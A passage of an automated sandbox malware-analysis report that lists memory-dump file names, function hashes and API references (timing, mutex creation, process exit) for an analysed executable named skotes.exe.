Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: v
API String ID: 3213747228-1361604894
Opcode ID: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
Instruction ID: 702e03ba5b1b779eb2ce0533c3f45a053ac65405d8417deba477d597bf0b72ee
Opcode Fuzzy Hash: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
Instruction Fuzzy Hash: 20B12232A042459FDB15CF29C8897BEBFE5EF85344F24A1AAE855FB242D634DD01CB60

Function 00E1BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00E1BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00E1BBE4
_xtime_get.LIBCPMT ref: 00E1BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00E1BC13

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 913bca16cdd74212213787ad841344be548bb177f0c9e982a7d2484506bf6c14
Instruction ID: 8b662ad4f61beb6942fa1b287fe0588968263ac083511fd23ec22bdb4557cf31
Opcode Fuzzy Hash: 913bca16cdd74212213787ad841344be548bb177f0c9e982a7d2484506bf6c14
Instruction Fuzzy Hash: C6211B75A00219AFDF00EBA4D8859FEB7B9EF48714F201469FA01B7261DB349D819BA1

Function 00E3F35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00E3F3A3

Strings

8", xrefs: 00E3F44B
`', xrefs: 00E3F375

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"$`'
API String ID: 3903695350-1436819768
Opcode ID: 65eabf49b29046124e52f5d1c397936e2cf147a9863bfbf7f8c415cd998f3365
Instruction ID: 6190999c04b14d708ab1b39b9ba36f3aa59b3d7d48cfa6b2c17c057d1e57332a
Opcode Fuzzy Hash: 65eabf49b29046124e52f5d1c397936e2cf147a9863bfbf7f8c415cd998f3365
Instruction Fuzzy Hash: A6315B32A00601DFEB21AA39D84DB5B7BE8EF4035DF54643AE095F7595DE71A880CB11

Analysis Process: skotes.exePID: 7400, Parent PID: 3364COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1925
Total number of Limit Nodes:	9

Executed Functions

Function 0039652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0039652A,?,?,?,?,?,00397661), ref: 00396567

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: c6fa82d96069a6baf1046da0cb1ad855efd5e898464605b115591c364df761fd
Instruction ID: df56bba8b657bcaf7b5ece515ca9449ffce18c8b15a43e8b11dd30e3ea038e4e
Opcode Fuzzy Hash: c6fa82d96069a6baf1046da0cb1ad855efd5e898464605b115591c364df761fd
Instruction Fuzzy Hash: D2E0C230002208AFCF37BF18C96AD493B29EF42799F124810FD198E222CB35ED81C680

Function 00369BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0036A963
CreateMutexA.KERNELBASE(00000000,00000000,003C3254), ref: 0036A981

Strings

T2<, xrefs: 0036A970

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2<
API String ID: 1464230837-1458272136
Opcode ID: 5a9752cf3d5b366edcaaf7304885b50d526346b4e007d46141678d619561e7f8
Instruction ID: a267e9a9baab287c201810a8dd85ae56df865920b981e4a544af39845b331ee5
Opcode Fuzzy Hash: 5a9752cf3d5b366edcaaf7304885b50d526346b4e007d46141678d619561e7f8
Instruction Fuzzy Hash: 4E317B316042048BEB1AEB78DDC979DBBBAEFC5314F20C619E014EB3D9C77599808B52

Function 00369F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0036A963
CreateMutexA.KERNELBASE(00000000,00000000,003C3254), ref: 0036A981

Strings

T2<, xrefs: 0036A970

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
